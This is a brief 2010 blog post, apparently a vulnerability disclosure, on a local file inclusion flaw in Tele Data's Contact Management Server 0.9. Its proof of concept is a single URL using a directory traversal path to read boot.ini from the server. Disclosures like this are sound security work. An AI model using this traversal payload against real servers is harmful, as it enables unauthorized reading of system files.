This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Local File Inclusion

A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini

2 comments: